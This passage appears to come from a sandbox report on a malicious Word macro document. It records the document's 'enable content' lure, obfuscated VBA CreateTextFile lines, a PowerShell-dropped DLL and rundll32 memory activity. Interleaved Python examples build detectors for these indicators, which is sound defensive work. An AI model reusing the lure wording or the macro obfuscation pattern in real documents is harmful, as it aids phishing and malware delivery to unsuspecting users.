Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I I Words:3 I 3 I N@m 13 ;a 1
Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains an embedded VBA macro with suspicious strings
Source: PACK.doc | OLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
Source: PACK.doc | OLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
Source: PACK.doc | OLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
Source: PACK.doc | OLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
Source: PACK.doc | OLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
Source: PACK.doc | OLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
Source: PACK.doc | OLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
Source: PACK.doc | OLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
Source: PACK.doc | OLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
Source: PACK.doc | OLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
Source: PACK.doc | OLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
Source: PACK.doc | OLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
Source: PACK.doc | OLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
Source: PACK.doc | OLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
Source: PACK.doc | OLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
Source: PACK.doc | OLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
Source: PACK.doc | OLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
Source: PACK.doc | OLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
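Added example, not part of the Joe Sandbox report and not code from PACK.doc: a static triage pass over VBA source that reproduces the two macro signatures above. The CreateTextFile targets in the report all start with a multi-letter "drive" such as gMEpHB:\, which no Windows path can have, so those calls can only fail; they are junk that pads the real logic and relies on error suppression. The VBA fragment below is constructed from the quoted lines, and the base64 literal is a placeholder I built (the report lists only the names of the encoded strings, not their contents).

```python
import base64
import binascii
import re

# Constructed VBA fragment modelled on the CreateTextFile lines quoted in the
# report. The base64 literal is a placeholder built here, not the real content.
SAMPLE_B64 = base64.b64encode(b"constructed placeholder, not the real payload").decode()
SAMPLE_VBA = r'''
Function Dn5440l_hb7()
    On Error Resume Next
    Set ChWZVJiB = CreateObject("Scripting.FileSystemObject")
    Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
    Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
    vRrzDEngIQvFPJfE = "__B64__"
    Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
End Function
'''.replace("__B64__", SAMPLE_B64)

CREATE_TEXT_FILE = re.compile(r'\.CreateTextFile\("([^"]*)"\)', re.IGNORECASE)
STRING_LITERAL = re.compile(r'"([^"]*)"')
VALID_DRIVE = re.compile(r'^[A-Za-z]:\\')              # a real Windows path starts X:\
B64_SHAPE = re.compile(r'^[A-Za-z0-9+/]{16,}={0,2}$')   # 16-char minimum cuts short identifiers
ON_ERROR = re.compile(r'^\s*On\s+Error\s+Resume\s+Next\b', re.IGNORECASE | re.MULTILINE)


def is_base64_like(s: str) -> bool:
    """Shape check plus a strict decode, so paths and identifiers do not qualify."""
    if not B64_SHAPE.match(s) or len(s) % 4:
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except binascii.Error:
        return False


def triage_vba(src: str) -> dict:
    """Collect the indicators the report's two macro signatures are built on."""
    paths = CREATE_TEXT_FILE.findall(src)
    # 'gMEpHB:\...' is not a drive letter: such a call always fails and exists
    # only to bury the real logic, usually under On Error Resume Next.
    bogus = [p for p in paths if not VALID_DRIVE.match(p)]
    b64 = [s for s in STRING_LITERAL.findall(src) if is_base64_like(s)]
    return {
        "create_text_file": paths,
        "bogus_paths": bogus,
        "base64_strings": b64,
        "on_error_resume_next": bool(ON_ERROR.search(src)),
        "suspicious": bool(paths) and (bool(bogus) or bool(b64)),
    }


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run it on the output of an olevba-style extraction of the document's macro streams; the "bogus_paths" ratio is the more robust of the two indicators, since benign macros that write files use real drive letters while obfuscators generate these paths at random.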
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
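Added example, not part of the report: the check behind "Powershell drops PE file" is a file-create event from a script host whose content carries an MZ/PE header. The code below parses only the DOS header, PE signature and COFF header, enough to confirm the image type and whether the DLL characteristic is set (the form a rundll32 payload normally takes). The creator path and the dropped-file path are taken from the report line above; the bytes are a constructed minimal image, since the report does not show the content of O_5Z.dll.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_DLL = 0x2000
# Script hosts that have no business writing executable images (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_minimal_pe(characteristics: int) -> bytes:
    """Constructed test image: DOS header, e_lfanew, PE signature, COFF header and
    an empty optional header. It is not O_5Z.dll, whose bytes the report omits."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)          # e_lfanew -> PE header at 0x80
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 0xE0, characteristics)
    return bytes(dos) + bytes(0x80 - 64) + b"PE\0\0" + coff + bytes(0xE0)


def classify_pe(data: bytes):
    """Parse just enough of the headers to say whether data is a PE and of what kind."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # 4 bytes of signature plus a 20-byte COFF header must fit inside the buffer.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return {
        "machine": machine,
        "sections": nsections,
        "optional_header_size": opt_size,
        # LoadLibrary does not require the DLL flag, so its absence proves little;
        # its presence just says the file is shaped the way rundll32 expects.
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "is_executable_image": bool(chars & IMAGE_FILE_EXECUTABLE_IMAGE),
    }


def review_dropped_file(creator_image: str, path: str, data: bytes):
    """A script host writing a PE image is the condition behind the signature."""
    info = classify_pe(data)
    if info is None:
        return None
    creator = creator_image.rsplit("\\", 1)[-1].lower()
    return {"path": path, "creator": creator, **info, "alert": creator in SCRIPT_HOSTS}


if __name__ == "__main__":
    image = build_minimal_pe(IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE | IMAGE_FILE_DLL)
    print(review_dropped_file(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                              r"C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll", image))
```

On a live host the same check runs over the first few hundred bytes of the created file; the 32-bit machine type matters here because the image was then loaded by the SysWOW64 rundll32.exe.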
Very long command line found
Source: unknown | Process created: Commandline size = 5293
Source: unknown | Process created: Commandline size = 5197
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5197
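Added example, not part of the report: the same length-based detection applied to process-creation telemetry, which is how this signature translates to an endpoint rule. Only the two lengths (5293 and 5197) and the cmd.exe parent come from the report; the events below are constructed in Sysmon Event ID 1 field naming, their command-line bodies are filler rather than the sample's real obfuscated text, and the 4096-byte threshold and the LOLBin list are assumptions to tune against a local baseline.

```python
LOLBINS = {"cmd.exe", "powershell.exe", "rundll32.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "regsvr32.exe"}   # assumed list
LENGTH_THRESHOLD = 4096                                     # assumed starting point


def _padded(prefix: str, total: int) -> str:
    """Filler so a constructed event reaches a given command-line length."""
    return prefix + "A" * (total - len(prefix))


# Constructed events (Image, ParentImage, CommandLine). Lengths 5293 and 5197
# are the ones the report records; the command-line bodies are filler.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": "unknown",
     "CommandLine": _padded("cmd /c ", 5293)},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": _padded("powershell ", 5197)},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\user\notes.txt"},
    # Long, but from an installer, not a script host: the usual false-positive shape.
    {"Image": r"C:\Program Files\Vendor\setup.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": _padded("setup.exe /quiet ", 4200)},
]


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_long_command_lines(events, threshold=LENGTH_THRESHOLD):
    """One finding per over-length command line, ranked by whether a script host
    or LOLBin sits on either side of the process creation."""
    findings = []
    for ev in events:
        length = len(ev["CommandLine"])
        if length < threshold:
            continue
        image, parent = _name(ev["Image"]), _name(ev.get("ParentImage", "unknown"))
        severity = "high" if image in LOLBINS or parent in LOLBINS else "low"
        findings.append({"image": image, "parent": parent, "length": length, "severity": severity})
    return findings


def chained_script_hosts(findings) -> bool:
    """True when a high-severity hit's parent is itself a high-severity hit,
    e.g. cmd.exe spawning powershell.exe, both with oversized command lines."""
    high_images = {f["image"] for f in findings if f["severity"] == "high"}
    return any(f["severity"] == "high" and f["parent"] in high_images for f in findings)


if __name__ == "__main__":
    hits = flag_long_command_lines(EVENTS)
    for hit in hits:
        print(hit)
    print("chained script hosts:", chained_script_hosts(hits))
```

The chain check is what separates this case from a noisy installer: a 5197-byte powershell.exe command line whose parent is a cmd.exe that itself carried 5293 bytes is two oversized script-host invocations in a row, which legitimate software rarely produces.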
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Cgjbbwbf\
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022B41F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00222C63
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00233895
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022C0C6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022EE78
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022568E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002302C3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002342DA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00228736
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00227B63
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00234B41
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0023340A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0023687F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022F444
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022E05A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0023A0AF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002280BA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002260B9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002248BD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0023889D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002288E5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00221CFA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002320C5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00230D33
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022F536
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022153C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00237D03
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022B112
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0023511B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00235D1D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00238D1C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002269A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00236DB9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002361B8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00239586
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022F98C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00227998
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00226D9F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002331E2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002371EF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00222A30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00229A37
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00224A35
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00237A0F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00235A61
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022EA4C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002262A3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00221280
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002312E2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002326F5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002296CD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00238ADC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022BB3A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00230F0C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00232B16
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00237F1F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022C769
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00230B68
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00231773
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022E377
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00228F78
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00225B79
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00239B45
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00232349
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00238F49
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00226754
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022B75F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002217AC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002373AC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0023878F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022839D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00233FE7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022D7EB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002367E9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002363C1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00231BDF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00229FDC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025B41F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00252C63
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025EE78
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025568E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00263895
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025C0C6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002602C3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002642DA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00258736
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00257B63
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00264B41
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002663C1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00254A35
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00259A37
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00252A30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00267A0F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0026340A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00265A61
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0026687F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025F444
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025EA4C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025E05A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002562A3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0026A0AF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002548BD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002560B9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002580BA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00251280
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0026889D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002588E5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002612E2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002626F5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00251CFA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002620C5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002596CD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00268ADC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025F536
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00260D33
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025153C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0025BB3A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00267D03
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00260F0C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00262B16
